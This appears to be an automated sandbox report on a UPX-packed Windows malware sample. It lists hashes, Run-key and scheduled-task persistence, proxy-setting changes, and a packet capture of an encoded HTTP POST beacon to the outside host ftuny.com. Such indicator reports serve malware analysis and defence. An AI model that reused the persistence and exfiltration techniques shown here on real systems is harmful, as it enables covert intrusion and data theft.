Analysis Date: 2014-08-22 08:50:21
MD5: 90d03ea797e70f5f70a3600b02480c9d
SHA1: 39a36b13ac679c8ddc55212ab24774129cebc3e0

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 — md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (empty section on disk; these are the md5/sha1 of zero-length input)
Section UPX1 — md5: 22be90dce248bb32f69c4057f131dbed sha1: 1143202818d0e9c65a2c6027385d694e5d13d489 size: 145920
Section .rsrc — md5: a1607d303063e8da73bf57c821362a6e sha1: 9a545157e65ca6977465951ac889403778d5adbb size: 1024
Timestamp: 1992-06-19 22:22:17
Packer: UPX -> www.upx.sourceforge.net
PEhash: ddf0000c2beff9c4fe9ce52a400180f6c5d6556e
IMPhash: bf68d6af7ffbfe567c70a675e5633654

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\OUU6KC5WPX\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OUU6KC5WPX ➝ (autostart persistence)
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job (scheduled-task persistence)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: ftuny.com

Network Details:

DNS: scribd.com
Type: A
23.235.44.175
DNS: avg.com
Type: A
93.184.211.28
DNS: avg.com
Type: A
93.184.217.9
DNS: ftuny.com
Type: A
208.73.211.163
DNS: ftuny.com
Type: A
208.73.211.174
DNS: ftuny.com
Type: A
208.73.211.175
DNS: ftuny.com
Type: A
208.73.211.193
DNS: ftuny.com
Type: A
208.73.211.242
DNS: phreeway.com
Type: A
HTTP POST: http://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.163:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   7055336b 4f487037 65526348 5069596f   pU3kOHp7eRcHPiYo
0x00000150 (00336)   3939494d 55756a67 55573462 76544964   99IMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c72 76336c49   /Golwxlm9kLrv3lI
0x00000230 (00560)   365a6b36 6e333664 2f33346b 70565633   6Zk6n36d/34kpVV3
0x00000240 (00576)   59365168 2f413d3d                     Y6Qh/A==


Strings
!O
.<

0dhkqD
0$Ex$x
0@G+u{
164<	8
 1mmUua
1(WybC
	%2tsl
2]Z$Gwc
)/3IE}c"
<3Q%uj
3S9V}[
4bEX&T9
4`'\CH
4WH )lm(
5AGD5{
&@5_mI
5o6Aiq
5/u|h-
60+P7[
6m!B~g
6P&y/za@
6St4hi
7-,0KO
75orc}
.'|76v
~7E),+
7e>[h8]
?)7Fd2
7:FF6XG
7iO	>G
7Kd:b;
81nth3
8;[RF|
>]8sOd
]8*tbk#
8xdZns
9@8/n).
"9/B*}
9ja4rW
]=9L^~
)9:u_o!R
a[:BZ;
aC7v~~0
ak,`a`
AltTabInfoF
>,an(P
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="WindowsUAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B@;5)sqHt
b[#8W)a
;~b gv
bmCCGt
B`|R)l
b|~wz"
)C5==+
C5fZ<8
c8\@t$
CancelDC
ce910bfic
~celDCC
_cfnt]
Chf(X(
C-_H U
@CIbV$
C_^PSt
cQ,9m'
CsK+CG4z
d']#[;
.~D$3}
D7BnwQ7E
d9%Yz '
d#:AGw
;`DB_B
DebugBGk
D#E$:l
DIKHj,v
}DkK2cp
Dol*hS
d#Q'*3
"<D=uG
	E~1}Q@
e5At9U
"|E96@
|)Ej<)
eL/ 4K:N
E=L"=t
E-mV%6
e}u4oTp
ExitProcess
F}""A"
Fk=,%l
FLMclb
fPK%:4A
` Fu(n
f}!"&x<
fXm/u_
)FZP^Y{
=~>%>@G
g/+}6~
gdi32.dll
GetProcAddress
GGetPkc
g<tO|lF
hDZxRAo
hhh#Ov
HideCaret
$hl<wu4m
+H\q:~
h@(zuu5k
?}I%G%*HO0
i)i8i'
ipt	=|
IsV)idCodePage
It<H2D
iwfq\l
(J+b';
#J%h37
*jk;lF'
J`l& kB/
j=&\~@o`
J{sxz2
K 2#\m
>	#k8g
KERNEL32.DLL
KsLj#At
\l:0/B
[l6y=G
%\l_]7
.l86<J3Z9;
LC%3s9
(l#/|]cM	
^L/D>6
LoadLibraryA
/LoadLibraryExW
lpIh}:j$
(LUC~z
=;l;vJ
M7|mi:g
m+9WEt
m|eqa7V
M"f#.!
mHa{E4t
m$p[.7
m_Qpv8
mRhk!e
mVDnR;
N2P37Qya
n5t,Q'
<N84PsX
	+\Nbd[I
ndu}?p 5
n!GF:B
NJBK;m
;.njh8
N'LSN;S
n{|ob-
N	rNj{X
n<}tY'
	o	~4|cln
o"7&Oaf+
o;>/i!
OtMJ##
-OX*_+u
p]7noNw)
piBNSI
:P_M==v
PPdMo.
^P{RzM
pS6c-z
\PTi44|
!ptz8w
pyFiX'
Q0q-?$=
Q5(6>x
Q5t<p 
Q7FuT:f
Q&&;\$Don
 Q_>e:l
qKJ!FQO
}qO`F{
Qt7}Gk
QtHeuj
q,>,@v
==qyf9Y~
!r2oq[
r<8|:S3
r%`AG9:
RBbLGO
ReadPrinter
r~Ebk?
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
*r&jUl
}]ro=n
]r[To+
`Rt`'s?~+h
R=u?HS5
:Rw_+&
SCODEN
SC<!O*E
      </security>
      <security>
si2F+"
sJ@F8`z
SMC[n=
/s.TlHQt
StringX
S?Utm!9oP
sv((uka
.}_<T"
t} 4/\|E
T5@wY{]
TA*[}i
]T_A yE
tG;B@o
This program must be run under Win32
t:m|>VZ
?(	t!qn
=,TRNL
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
u4u[?`
ufX'\.
u<j:6B
u+:Jy| 
#ukCW.
u#Q9-3b
user32.dll
V,9'!T
VirtualAlloc
VirtualAlloc&
VirtualFree
VirtualProtect
vKwfI`
vst<nsoleWindowSiz9Enum{
_vyNCD.8
)v,yQF
W!4:hS
_]w88/
widaA]
winspool.drv
[wJa6]
WMI ].b
=~ wN*
>WN&2Cci9kzkb[
\W=sC=
W=T4Z 
Wu_66|
WV6vm<
w:"Xz}4C
X8La8;
-=x+>B
x>>b7|v
{Xhw4w
XI	{sN
x(m7|}u_Y
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+)XP	6
XPTPSW
xQ#o<U
#^xun{
]xxQO;
+xY2J'
YeMthW
:(_Y$H
|:)yJ3@W
Z_4Q-:
z9T2[E
Zf`.c|
zg<uG0nE
z=<(jx
zKPHWl
Z`M"CSa
Zn$;2#F=
]zODl?
z>v_5<
zvQ:tj